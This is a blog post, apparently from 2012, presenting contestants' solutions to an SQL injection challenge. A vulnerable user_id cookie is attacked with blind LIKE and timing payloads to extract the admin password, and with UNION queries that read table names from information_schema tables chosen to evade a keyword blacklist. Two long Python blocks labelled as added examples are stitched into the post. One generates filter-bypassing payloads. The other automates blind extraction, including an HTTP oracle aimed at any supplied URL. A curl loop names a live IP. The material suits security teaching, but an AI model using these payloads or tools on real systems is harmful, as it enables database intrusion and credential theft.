Solutions for challenge 2A

Posted on July 12, 2012 by Roberto Salgado

After receiving many submissions for the SQL Injection challenge 2A, I decided it was time to show some of the solutions used to solve this challenge. In case you missed out on the series of SQL Injection challenges I released a few months ago, they are currently still online and available to try out. There are 3 challenges, each with part A and B. Out of all the challenges, challenge 2A ended up being one of the easier ones and since the solutions didn't vary too much, I decided to pick this challenge to be the first to show the solutions to.


Explanation

DISCLAIMER: If you haven't tried this challenge, it is still available here in case you want to give it a shot before reading the SOLUTIONS below.

What differentiates this challenge from the others is that it lets you log in as guest. Doing so displays a welcome message with the username and privileges and sets a cookie named user_id. As the name suggests, user_id holds the id of the logged-in user, which for guest is 1. If the cookie value is changed to 0, the message shows admin as the username with administrator privileges. This indicates that the username and privileges are looked up from the MySQL database by the value of the user_id cookie, so the injection point is that cookie. The next step is to figure out which characters are allowed and which are filtered.

The main idea behind this challenge is to find a way to retrieve the table and column names without using information_schema.tables or information_schema.columns. For that reason I used very little filtering. Initially I had only blacklisted the following strings:

$blacklist = array('tables', 'columns', '(', ')');

Many WAFs rely on blocking the keywords 'tables' and 'columns', so I wanted to demonstrate that an attacker does not need those keywords to obtain the table and column names; I later added mysql_real_escape_string() as an extra layer of difficulty. There are several tables besides the widely known information_schema.tables and information_schema.columns from which table and column names can be read. The only condition is that some of them only list tables and columns that are part of a key or index, and since every table should have a primary key, chances are high that this will work. Some examples are:

information_schema.key_column_usage

information_schema.table_constraints

information_schema.statistics

information_schema.partitions
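
The filter and the alternative sources described above, as an added example in Python (not the challenge's own code and not a submitted solution): it models the blacklist plus mysql_real_escape_string as the post describes them, assuming the blacklist check is case-insensitive, and builds UNION payloads in the four-column, third-column-displayed layout that the submitted Second Category payloads use. Putting the companion column in the second slot is an assumption drawn from Paul da Silva's payload; the table names in the usage are constructed.

```python
"""Added example; not the challenge's own code nor a submitted solution.

Models the filter the post describes (token blacklist + mysql_real_escape_string)
and builds UNION payloads that read table/column names from information_schema
sources other than TABLES and COLUMNS. Column layout (four columns, the third
shown as the username) follows the submitted payloads.
"""
from typing import Optional, Tuple

BLACKLIST = ("tables", "columns", "(", ")")


def mysql_real_escape_string(s: str) -> str:
    """The characters mysql_real_escape_string() escapes (single-byte charset assumed)."""
    table = {"\\": "\\\\", "\0": "\\0", "\n": "\\n", "\r": "\\r",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def challenge_filter(cookie: str) -> Tuple[bool, Optional[str]]:
    """Return (accepted, value as MySQL sees it).

    Blacklist matching is assumed to be case-insensitive, as a WAF rule would be;
    the post does not say which it was. Hex literals (0x...) contain nothing the
    escaper touches, which is why every payload below uses them instead of quotes.
    """
    low = cookie.lower()
    if any(tok in low for tok in BLACKLIST):
        return False, None
    return True, mysql_real_escape_string(cookie)


def hex_literal(s: str) -> str:
    """'rules' -> '0x72756c6573', usable as a string literal without quotes."""
    return "0x" + s.encode().hex()


# Source -> companion column that can be shown next to table_name.
# key_column_usage, table_constraints and statistics only list tables that
# have a key or index; partitions has a row for every table.
SOURCES = {
    "information_schema.key_column_usage": "column_name",
    "information_schema.table_constraints": "constraint_name",
    "information_schema.statistics": "column_name",
    "information_schema.partitions": "partition_name",
}


def enum_payload(source: str, row: int, exclude=(), ncols: int = 4,
                 show: int = 3, show_extra: Optional[int] = None) -> str:
    """Cookie value that puts row `row` of `source` into displayed column `show`.

    `exclude` drops table names already seen; it is written as a chain of
    table_name<>0x... comparisons because NOT IN (...) needs the blacklisted
    parentheses. show_extra=2 puts the companion column in the second slot
    (the privileges text, going by Paul da Silva's payload; an assumption).
    """
    cols = [str(i + 1) for i in range(ncols)]
    cols[show - 1] = "table_name"
    if show_extra is not None:
        cols[show_extra - 1] = SOURCES[source]
    conds = [f"table_name<>{hex_literal(t)}" for t in exclude]
    where = " where " + " and ".join(conds) if conds else ""
    return f"-1 union select {','.join(cols)} from {source}{where} limit {row},1"


if __name__ == "__main__":
    # -1 selects no real row, so only the UNION row is rendered.
    # 'reglas' and 'rules' are constructed names standing in for tables already seen.
    for src in SOURCES:
        ok, seen = challenge_filter(enum_payload(src, 0, exclude=("reglas", "rules")))
        print(ok, seen)
```

Every payload the generator produces passes the modelled filter unchanged, while the equivalent query against information_schema.tables is rejected and any payload that falls back to quoted strings reaches MySQL with the quotes escaped.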

Some of the solutions I received used a method I had not anticipated when writing the challenge. These solutions guessed the column name and extracted the password through blind SQLi. In hindsight I should have added a prefix to the column names so they couldn't be guessed as easily. However, I did learn something from it: I knew the LIKE statement doesn't require quotation marks; what I didn't know is that you could use the wildcards % and ? without the quotation marks. Below are the solutions that were submitted:


Solutions

Raz0r/BlackFan:

Solution omitted as it can be used to solve challenge 2B.

First Category (blind extraction with a guessed column name)

FluxReiners:

user_id=0 and username='admin' and mid(password,1,1)='e'

Team Rebel:

user_id=0 and 1=(IF(ascii(substring(password,1,1))>100, (select benchmark(100000000,md5(0x41))), false))

p____h:

user_id=0 and password LIKE "el%uitas"

NULL Life:

Submitted a PHP script found here.

mortis:

user_id=0 and username=0x656c25

tlk:

user_id=-1 OR password LIKE BINARY 0x{chars}25

g4mm4:

user_id=0 and password like binary 0x456c25

Submitted a Python script found here.

w00d:

user_id=0 and password like 0x[blind-here]25

gijs:

user_id=0 and password >= BINARY 0x41

Karion:

for i in {2,3,4,5}; do for j in {0,1,2,3,4,5,6,7,8,9,0,A,B,C,D,E,F,G} ; do echo $i$j ; curl http://50.57.51.240/challenges/2A/challenge.php -b "user_id=0 and password LIKE 0x454C5F564552475549544153${i}${j}25" 2>&1 | grep ADMIN ;done ;done
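
The blind technique used by the First Category solutions above, automated as an added example in Python (not the post's code and not any submission): the candidate prefix goes in as a hex literal so mysql_real_escape_string has nothing to escape, it is compared with LIKE BINARY so matching is case-sensitive, and % and _ in the prefix are escaped so they match literally. The local oracle is a constructed stand-in for the challenge server; http_oracle's cookie name and the ADMIN marker follow the curl/grep loop above, and its URL is whatever target you point it at. The secrets used in the usage are constructed.

```python
"""Added example (not from the original post or any submitted solution).

Automates blind LIKE-based extraction: hex literal (no quotes to escape),
LIKE BINARY (case-sensitive), % and _ escaped so they match literally.
make_local_oracle() is a constructed stand-in for the challenge server.
"""
import re
from typing import Callable

ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_%!$-."


def hex_literal(s: str) -> str:
    """'el%' -> '0x656c25'; MySQL reads it as a string, so no quotes are needed."""
    return "0x" + s.encode().hex()


def like_escape(s: str) -> str:
    """Make %, _ and the escape character itself match literally inside a LIKE pattern."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def like_payload(prefix: str, column: str = "password", escape: bool = True,
                 binary: bool = True, anchored: bool = False) -> str:
    """Cookie value: user_id 0 is the admin row; the predicate keeps or drops it.
    anchored=True sends the prefix without a trailing % (exact-match check).
    The escaping backslashes sit inside the hex literal, untouched by the filter."""
    pat = like_escape(prefix) if escape else prefix
    if not anchored:
        pat += "%"
    return f"0 and {column} like{' binary' if binary else ''} {hex_literal(pat)}"


def extract(oracle: Callable[[str], bool], alphabet: str = ALPHABET,
            column: str = "password", escape: bool = True, binary: bool = True,
            max_len: int = 64) -> str:
    """Recover `column` one character at a time. oracle(payload) returns True
    when the admin row is still shown (ADMIN in the response)."""
    found = ""
    while len(found) < max_len:
        for ch in alphabet:
            if oracle(like_payload(found + ch, column, escape, binary)):
                found += ch
                break
        else:
            # Nothing extends the prefix: either we are done or the next character
            # is outside `alphabet`. An anchored query tells the two apart.
            if oracle(like_payload(found, column, escape, binary, anchored=True)):
                return found
            raise ValueError(f"stuck after {found!r}: extend the alphabet")
    return found


# ---- constructed stand-in for the server; use http_oracle() against a live target
def mysql_like_to_regex(pattern: str, case_sensitive: bool) -> "re.Pattern":
    """MySQL LIKE pattern -> regex (% = any run, _ = one char, backslash escapes)."""
    out, i = [], 0
    while i < len(pattern):
        c = pattern[i]
        if c == "\\" and i + 1 < len(pattern):
            out.append(re.escape(pattern[i + 1]))
            i += 2
            continue
        out.append(".*" if c == "%" else "." if c == "_" else re.escape(c))
        i += 1
    flags = re.DOTALL | (0 if case_sensitive else re.IGNORECASE)
    return re.compile("".join(out), flags)


def make_local_oracle(secret: str) -> Callable[[str], bool]:
    """Evaluates the injected predicate against a known secret, honouring BINARY."""
    def oracle(payload: str) -> bool:
        m = re.fullmatch(r"0 and \w+ like( binary)? 0x([0-9a-f]+)", payload)
        if not m:
            return False
        pattern = bytes.fromhex(m.group(2)).decode()
        return mysql_like_to_regex(pattern, bool(m.group(1))).fullmatch(secret) is not None
    return oracle


def http_oracle(url: str) -> Callable[[str], bool]:
    """Real oracle: send the payload in the user_id cookie and look for ADMIN,
    mirroring the curl/grep loop. `url` is the challenge page you are testing."""
    import urllib.request

    def oracle(payload: str) -> bool:
        req = urllib.request.Request(url, headers={"Cookie": "user_id=" + payload})
        with urllib.request.urlopen(req) as resp:
            return b"ADMIN" in resp.read()
    return oracle


if __name__ == "__main__":
    print(extract(make_local_oracle("S3cr_t%pw")))  # constructed secret, not the real one
```

Two failure modes the parameters expose: with escape=False a secret containing only ordinary characters still comes back as a run of underscores if `_` is tried before the real character, because the unescaped `_` matches anything; with binary=False the recovered string has the right letters in the wrong case, since plain LIKE compares case-insensitively.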

Second Category (table names from other information_schema tables)

Sebastien Blot:

user_id=-1+union+select+1,2,table_name,4+from+information_schema.key_column_usage+limit+2,1--

Miroslav Stampar:

user_id=-1 UNION ALL SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLE_CONSTRAINTS LIMIT 2,3

Paul da Silva:

user_id=-1 union select null,COLUMN_NAME,TABLE_NAME,null from information_schema.KEY_COLUMN_USAGE where table_name<>0x7265676c6173 and table_name<>0x72756c6573 limit 0,1--

Dominus:

user_id=0+and+0=1+union+select+1,2,table_name,4+from+information_schema.statistics+limit+2,1 


A full list of the victors for each challenge is available here.
